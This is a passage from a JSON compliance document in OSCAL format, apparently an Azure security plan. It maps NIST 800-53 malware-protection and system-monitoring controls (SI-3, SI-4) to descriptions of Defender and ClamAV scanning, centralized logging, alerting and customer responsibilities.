statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"abe3b1b7-f35e-4c29-991d-adc3e2d53391","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.b","by-components":[{"uuid":"53eb133c-7edc-4907-9275-eea1dff55950","export":{"provided":[{"uuid":"1b4b2c14-2e5d-42be-9871-5c9e5619b1fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"}],"description":"Servers\n\nAzure updates malicious code protection mechanisms for Defender and ClamAV, including signature definitions, whenever new releases are available. The anti-malware software is configured to check for updates to the signature files at least daily and automatically update the signatures accordingly. 
\n\nNetwork Devices\n\nNetwork devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software described above and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and comprehensive logging and monitoring."}],"responsibilities":[{"uuid":"2ab4f880-597e-44dc-bfa7-8c3c836abc1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for automatically updating malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.","provided-uuid":"1b4b2c14-2e5d-42be-9871-5c9e5619b1fd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0b2e4ceb-2b32-4224-b0df-ca727fe335ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"statement-id":"si-3_smt.c","by-components":[{"uuid":"adb92fb0-540b-4908-a009-a5f46b3dcd82","export":{"provided":[{"uuid":"f459dd33-cd51-4d3e-8d57-d5941893681d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"}],"description":"Servers\n\nDefender and ClamAV are centrally managed via Azure Security Pack (AzSecPack). 
On each endpoint for each service team, the anti-malware software performs:\n\n* periodic scans at least weekly, and\n* real-time scans of files as they are downloaded, opened, or executed.\n\nNetwork Devices\n\nNetwork devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and in-depth logging and monitoring."},{"uuid":"6af5def5-bb54-4016-b321-4433607a5a6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"description":"Servers\n\nWhen Defender detects malware, it attempts to block the malware and an alert is generated and sent to Azure service teams, Azure Security, and/or C+AI Security, depending on the severity of the malware and the outcome of Defender-initiated actions. When ClamAV detects malware, it does not auto-remediate the malware. Instead, Microsoft Threat Intelligence Center (MSTIC) detections are used to analyze commands generated as part of process activity to look for anomalous activity. The ClamAV anti-malware software on Linux servers is currently not configured with on-access scanning enabled. As such, real-time scanning and protections for Linux services are not provided. To mitigate the risk that malicious files are copied or installed on Linux servers and remain there until found by the weekly scans, Azure has implemented strong access management controls, traffic flow restrictions, and system-level monitoring that are in place for all Azure servers including Linux. 
Response to anti-malware detections is handled by a combination of the service teams, for those detections that autoroute to the service owners, and the Microsoft Security Response Center (MSRC) working in the Cyber Defense Operating Center (CDOC), which reviews detections for anomalous activity. The receiving personnel initiate the incident management process as applicable. For successfully blocked malware, no additional action is needed. Incidents, including false positives, are tracked and resolved, and post-mortem analysis is performed on incidents where it is determined necessary. Customers, including government customers and US-CERT, are notified by the incident management processes if required.\n\nNetwork Devices\n\nNetwork devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and in-depth logging and monitoring."}],"responsibilities":[{"uuid":"71875f0d-f42a-4195-9e88-d72dea0b6df9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against malicious code by configuring mechanisms to perform periodic scans of the system at a customer-defined frequency and perform real-time scans of files from external sources at endpoint and/or network entry/exit points as the files are downloaded, opened, or executed in accordance with organizational security policy.","provided-uuid":"f459dd33-cd51-4d3e-8d57-d5941893681d"},{"uuid":"adceb717-e31e-490d-b799-f879ceba9a7c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for one or more of blocking malicious code; 
quarantining malicious code; or taking an organization-defined action; and sending alerts to organization-defined personnel or roles in response to malicious code detection.","provided-uuid":"6af5def5-bb54-4016-b321-4433607a5a6a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f36dbc6-7155-4c9d-8e02-804acd76e9f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.d","by-components":[{"uuid":"443eff55-4b54-40c9-9d59-1e1449bbf406","export":{"provided":[{"uuid":"2f629fe6-3148-4bdf-bc10-8bc43651953c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"}],"description":"Servers\n\nOn the Windows operating system, Defender by default quarantines malicious code identified by the anti-malware software and does not immediately delete it. Falsely identified malicious code is put in a quarantine folder on the system. Azure can roll back quarantined files if they are falsely determined to be malicious code, to resolve impact to operations in the system. For Linux operating systems, Azure uses ClamAV to identify the characteristics and behavior of malicious code. ClamAV does not auto-remediate the malware. Instead, Microsoft Threat Intelligence Center (MSTIC) detections are used to analyze commands generated as part of process activity to look for anomalous activity. 
Response to anti-malware detections is handled by a combination of the service teams, for those detections that autoroute to the service owners, and the Microsoft Security Response Center (MSRC) working in the Cyber Defense Operating Center (CDOC), which reviews detections for anomalous activity.\n\nNetwork Devices\n\nNetwork devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle, configuration management and control, supply chain processes, and in-depth logging and monitoring."}],"responsibilities":[{"uuid":"17e86dd5-2d5c-49f1-8b50-cc648e00cd0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for addressing the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.","provided-uuid":"2f629fe6-3148-4bdf-bc10-8bc43651953c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1e203710-8b9a-4084-ac2f-db7f6a88c97d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4","statements":[{"uuid":"d8edb828-ae39-4a22-8a0d-1004b21abf0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"statement-id":"si-4_smt.a","by-components":[{"uuid":"1b47cffd-a697-40f3-8f8a-9e192ed84ce0","export":{"provided":[{"uuid":"912fc4bf-8ba5-4f8e-be1f-75ea0b8123bf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"}],"description":"Azure requires service teams to deploy active monitoring solutions that generate audit logs and alerts as a required step in the Security Development Lifecycle (SDL) process, described in the CM family of controls. All service teams upload their logs to Geneva Monitoring, where they are aggregated and processed as described in the AU family of controls. The Logging and Monitoring team assists in identifying normal usage of the system and deviations from that normal range. The tooling automatically reviews audit logs and antivirus and anti-malware information to confirm that the system is functioning in an optimal, resilient, and secure state and identifies irregularities or anomalies that are indicators of a system malfunction or compromise. Unusual activity is flagged for further review via detections and alerts. 
Any log event that indicates a potential violation of the Microsoft Security Policy (MSP) is immediately brought to the attention of Azure Security. In addition, the implemented host-based SDN firewall uses a deny all policy."},{"uuid":"7d0b7a89-f79c-4f20-806d-4677f42946f3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"description":"Local connections are disallowed by policy within Azure. No personnel have local access. Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise."}],"responsibilities":[{"uuid":"e64ab2a1-6b93-4471-aaac-7a925b988549","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to detect: attacks and indicators of potential attacks in accordance with customer-defined monitoring objectives.","provided-uuid":"912fc4bf-8ba5-4f8e-be1f-75ea0b8123bf"},{"uuid":"d72c4699-6288-4784-bc79-81123f052a8f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to detect: unauthorized local, network, and remote connections.","provided-uuid":"7d0b7a89-f79c-4f20-806d-4677f42946f3"}]},"description":"See inheritance 
and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e9bf9004-d789-455f-94b3-fca2e22c7f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.b","by-components":[{"uuid":"fb1d5646-35f9-4c0a-ad8e-c61fd7d504dc","export":{"provided":[{"uuid":"299af419-6101-4b14-952e-4830641c2b19","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to provide direct alerting using IcM tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams, as appropriate. The policies are tuned to alert on events of immediate concern: events that need little or no correlation to prompt a preliminary investigation and the attention of Security Response Team personnel. Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time, specifically in the case of a security incident, customer request or escalation, or any other functionality-impacting incident in production. 
Groups of these correlated events that meet a pattern of a known attack methodology are collected and delivered to personnel via IcM or email. Personnel correlate alerts, collect multiple similar alarms, and append them to tickets for review and analysis. The alerting system provides response capability twenty-four (24) hours a day, seven (7) days a week. Troubleshooting Guides (TSGs) applied to workflow tickets provide instructions for the escalation of certain events to response personnel."}],"responsibilities":[{"uuid":"cb48b1b8-e69d-43c0-b613-7af472d770bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to identify unauthorized use through customer-defined techniques and methods.","provided-uuid":"299af419-6101-4b14-952e-4830641c2b19"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ab1a226f-ce60-4f64-b713-d223fb2a2d00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"statement-id":"si-4_smt.c","by-components":[{"uuid":"9f0cb532-af8c-45e3-be26-b043c3b032e5","export":{"provided":[{"uuid":"1e299232-79fb-4b34-b00a-e3befae43e7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"}],"description":"All assets act as monitoring devices and are configured to log all security-relevant events. 
Suspicious events generate alerts and notifications to service team staff and incident management staff as needed. Azure assets are configured to upload their logs to a central repository managed by C+AI Security. These logs are aggregated and reports are generated by the Security Response Team. Because of the extensive centralized management of all audit logs, Azure has determined that there is no need for ad-hoc deployment of monitoring devices."},{"uuid":"caa86cdf-4fa7-4994-beb0-75e67ced0ff7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"description":"All assets act as monitoring devices and are configured to log all security-relevant events. Suspicious events generate alerts and notifications to service team staff and incident management staff as needed. Azure assets are configured to upload their logs to a central repository managed by C+AI Security. These logs are aggregated and reports are generated by the Security Response Team. Because of the extensive centralized management of all audit logs, Azure has determined that there is no need for ad-hoc deployment of monitoring devices."}],"responsibilities":[{"uuid":"1aeb5811-b14a-48a8-8e28-971bc279d1e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring monitoring devices for customer-deployed resources strategically to collect customer-defined essential information, and at ad hoc locations to track specific types of transactions of interest to the organization.","provided-uuid":"1e299232-79fb-4b34-b00a-e3befae43e7d"},{"uuid":"2827f7b7-b27f-4c8a-9fd7-b6356458a8f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring monitoring devices at ad hoc locations to track specific types of 
transactions of interest to the organization.","provided-uuid":"caa86cdf-4fa7-4994-beb0-75e67ced0ff7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dad67e8a-001b-49f9-bffa-1cf9f86d99d8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.d","by-components":[{"uuid":"7be370e5-98f5-4643-b99b-dbd0c2f386bd","export":{"provided":[{"uuid":"fd3033de-11d0-430e-8996-175311492020","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"}],"description":"Only service team personnel for the specific asset within Azure have access to security logs on the local asset via the role-based access control (RBAC) implemented via OneIdentity. Azure implements protection of audit information using an authenticated and encrypted connection from the local asset of log generation to the centralized audit collection systems using the Geneva Monitoring Agent (MA). Access to the centralized audit collection systems and storage is restricted to the Security Engineering and Operations groups based on the standard access groups defined for Azure. Only authorized service team personnel are allowed access to the actual audit records, and their assigned rights prohibit them from modifying or deleting audit information. Even if a user is able to clear local asset log data after elevating permissions via an approved JIT request, the action of cleaning the data is logged, and the cleared log data is present on Geneva Monitoring storage due to central ingestion. 
The following mechanisms are used to protect log information in transit and at rest: * Logs on the local asset can only be accessed through direct login to the asset. * The transfer of logs from the local asset to the service team and central storage accounts occurs over an HTTPS connection. * Read-only access to logs in Geneva Monitoring storage for Azure users is enabled through the Geneva Monitoring front-end portal. The access is restricted through AD security groups which are managed through OneIdentity."}],"responsibilities":[{"uuid":"7915f8f3-a95f-43c1-86c1-ed658bed8687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources and analyzing detected events and anomalies.","provided-uuid":"fd3033de-11d0-430e-8996-175311492020"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"00104290-3810-4b0a-803d-077a297bc328","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.e","by-components":[{"uuid":"a77f984e-36c3-41e0-88c6-5df4aa95628b","export":{"provided":[{"uuid":"b037db9b-ac40-437c-a2f4-6868ccfa9ba2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"}],"description":"Azure Security notifies service teams if a change in the level of monitoring is necessary due to indications of increased risk, and service teams adjust monitoring accordingly. 
Additionally, tooling heuristics are tailored to look for specific threats based on the nature of the risk to Azure operations and assets."}],"responsibilities":[{"uuid":"63ad6eda-b1a9-4cf8-8e7b-14096d49fa75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for adjusting monitoring activity whenever there is an indication of increased risk to customer operations, assets, and individuals; other organizations; or the Nation based on law enforcement information, intelligence information, or other credible sources of information.","provided-uuid":"b037db9b-ac40-437c-a2f4-6868ccfa9ba2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6f3cce8f-d3cb-4f41-8090-77e5738f07b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.f","by-components":[{"uuid":"0f94c2e4-78b1-4245-81ab-db9b2e149c52","export":{"provided":[{"uuid":"37e15410-f3ca-4831-8c75-a6d9379fdaee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"}],"description":"Azure Security and the Security Response Team, in consultation with Corporate, External, and Legal Affairs (CELA), define a set of log events and alerts that meet regulatory requirements for incident management and investigation. This structure is intended to support identification of known suspicious activity and to support the investigation of misuse and abuse of Azure services. 
To comply fully with applicable regulations, Azure service teams follow defined requirements for event collection and notification processes."}],"responsibilities":[{"uuid":"a4ed6c45-f5ef-4960-8cc5-326413d98f99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining legal opinion with regard to system monitoring activities in accordance with applicable federal laws, Executive Orders, directives, policies, or regulations.","provided-uuid":"37e15410-f3ca-4831-8c75-a6d9379fdaee"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2ba9842f-7044-4c17-9428-fea87d41ab1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.g","by-components":[{"uuid":"6593c959-1424-4f1b-9e0c-b590fd687914","export":{"provided":[{"uuid":"aee1e997-a82c-494b-9b5c-e704cc2b236a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"}],"description":"All services upload logs to Geneva Monitoring for aggregation and analysis. Alerts are generated from this data by Azure Security and C+AI Security. 
This data is available as needed."}],"responsibilities":[{"uuid":"244bc072-b577-467e-af20-44a896804a03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing selected monitoring information to customer-defined personnel/roles as needed and/or at the required frequency.","provided-uuid":"aee1e997-a82c-494b-9b5c-e704cc2b236a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7dee4316-3984-46ad-9700-f930b1ccc934","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.1","statements":[{"uuid":"800ecafb-eb59-49a5-ad75-f04466c5beb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.1_smt","by-components":[{"uuid":"c9277364-3165-4843-af78-c611adbfa8df","export":{"provided":[{"uuid":"4883f87a-f3db-4a34-a964-38b39cfbea55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"}],"description":"Azure assets upload logs to a central repository managed by C+AI Security. Azure Security and the Security Response Team generate consolidated reports from this data, providing system-wide intrusion detections. Additionally, a combination of detection via the logging and monitoring pipeline and alerting infrastructure and fast response address the risk of intrusion. 
This includes the use of event forwarding tools, security incident and event management tools, vulnerability scanning and reporting tools, and anti-malware systems. These systems feed into central monitoring, which alerts the Security Response Team for any events that need further central investigation, or the service teams directly for alerts that are autorouted based on metadata available in Service Tree."}],"responsibilities":[{"uuid":"cc399290-c613-46b5-ad11-ebf41d30a1c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"}],"description":"The customer is responsible for monitoring customer-deployed resources, including the connection and configuration of individual intrusion detection tools, into a system-wide intrusion detection system.","provided-uuid":"4883f87a-f3db-4a34-a964-38b39cfbea55"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"83e437f1-8a13-497e-8062-6e1074d26982","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.2","statements":[{"uuid":"03cf481b-692e-404b-815d-7feed3ebe144","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.2_smt","by-components":[{"uuid":"31dad06e-775f-4793-8fb8-5c347b16bec2","export":{"provided":[{"uuid":"a4b02b97-e749-4611-95db-2420334dfdb9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to do direct alerting using Incident Management (IcM) tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Microsoft Operations Center (MOC) and service teams, as appropriate. The policies are tuned to alert on events of immediate concern: events that need little or no correlation to prompt a preliminary investigation and the attention of Security Response Team personnel. Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time, specifically in the case of a security incident, customer request or escalation, or any other functionality impacting the incident in production. Groups of these correlated events that meet a pattern of a known attack methodology are collected and delivered to personnel via IcM or email. Personnel correlate alerts, collect multiple similar alarms, and append them to tickets for review and analysis. The alerting system provides response capability twenty-four (24) hours a day, seven (7) days a week. 
Troubleshooting Guides (TSGs) applied to workflow tickets provide instructions for the escalation of certain events to response personnel."}],"responsibilities":[{"uuid":"cb873557-2c2b-4ebd-9051-9ad4c0ac711e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"}],"description":"The customer is responsible for monitoring customer-deployed resources using automated mechanisms to support near real-time analysis of events.","provided-uuid":"a4b02b97-e749-4611-95db-2420334dfdb9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cffc97e2-b512-48e0-b69a-f57cc6757a8a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.4","statements":[{"uuid":"f81384bc-8122-4ef9-948e-89b0ba685a2e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.4_smt.a","by-components":[{"uuid":"9ed53965-49f7-453e-a8f9-f69031689dca","export":{"provided":[{"uuid":"98c74be5-379d-4d5a-a267-c21597db3edb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"}],"description":"Azure currently has detections in place that will alert on suspicious/malicious inbound and outbound network activities to include brute force attacks, distributed denial of service, communication with known malicious IPs, and cryptocurrency mining. Azure filters network traffic to Azure subscriptions at the Management Group Level. 
All traffic not allowed by the relevant Network Baselines will be blocked, regardless of Network Security Group (NSG) configuration within Azure Subscriptions. Traffic is effectively filtered at each level of the resource stack. In order for network traffic to get to an asset, it needs to be allowed by all of the levels of security rules."}],"responsibilities":[{"uuid":"91e5c349-bf89-42b4-9db9-46b200d2fca2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining criteria for unusual or unauthorized activities or conditions for inbound and outbound communications traffic.","provided-uuid":"98c74be5-379d-4d5a-a267-c21597db3edb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"22a8e450-5d18-48e3-8b2a-a0a7542f531b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.4_smt.b","by-components":[{"uuid":"899a2ad8-50e6-4195-9fed-39193dfcfc6c","export":{"provided":[{"uuid":"e7db36e1-512f-4912-8857-61f39a48c4c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"}],"description":"Azure monitors communications continually using the centralized monitoring, correlation, and analysis systems that manage the large amount of information generated by assets within the environment. 
